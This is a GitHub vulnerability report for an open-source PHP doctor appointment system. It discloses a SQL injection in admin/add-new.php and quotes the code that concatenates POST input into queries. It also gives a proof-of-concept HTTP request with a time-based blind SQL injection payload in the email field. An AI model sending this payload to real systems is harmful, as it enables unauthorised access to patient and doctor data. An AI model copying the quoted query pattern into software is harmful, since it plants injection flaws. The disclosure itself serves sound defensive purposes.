search

HashenUdara / edoc-doctor-appointment-system

This PHP-based open source project is a web application for booking medical appointments. Patients can use the platform to easily schedule appointments with their doctors, saving time and effort. The project's source code is open for anyone to use, modify, and distribute according to their needs.
MIT License
312 stars 120 forks source link

Found a vulnerability #30

Open KillerFr0st opened 1 year ago

KillerFr0st commented 1 year ago

admin/add-new.php from line 47, The $email parameter is controllable, the parameter email can be passed through post, and the $email is not protected from sql injection, line 54 $result= $database->query("select * from webuser where email='$email';"); causes sql injection

    if($_POST){
        //print_r($_POST);
        $result= $database->query("select * from webuser");
        $name=$_POST['name'];
        $nic=$_POST['nic'];
        $spec=$_POST['spec'];
        $email=$_POST['email'];
        $tele=$_POST['Tele'];
        $password=$_POST['password'];
        $cpassword=$_POST['cpassword'];

        if ($password==$cpassword){
            $error='3';
            $result= $database->query("select * from webuser where email='$email';");
            if($result->num_rows==1){
                $error='1';
            }else{

                $sql1="insert into doctor(docemail,docname,docpassword,docnic,doctel,specialties) values('$email','$name','$password','$nic','$tele',$spec);";
                $sql2="insert into webuser values('$email','d')";
                $database->query($sql1);
                $database->query($sql2);

                //echo $sql1;
                //echo $sql2;
                $error= '4';

            }

        }else{
            $error='2';
        }

    }else{
        //header('location: signup.php');
        $error='3';
    }

poc

POST /admin/add-new.php HTTP/1.1
Host: 192.168.0.104
Content-Length: 61
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.0.104
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.0.104/admin/doctors.php?action=add&error=3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=mpu5jiv1ln63f3hrl1avff7if7
Connection: close

name=1&email=' AND (SELECT 7810 FROM (SELECT(SLEEP(5)))POrN) AND 'FCcW'='FCcW&nic=4&Tele=5&spec=1&password=6&cpassword=6

Attack results pictures

image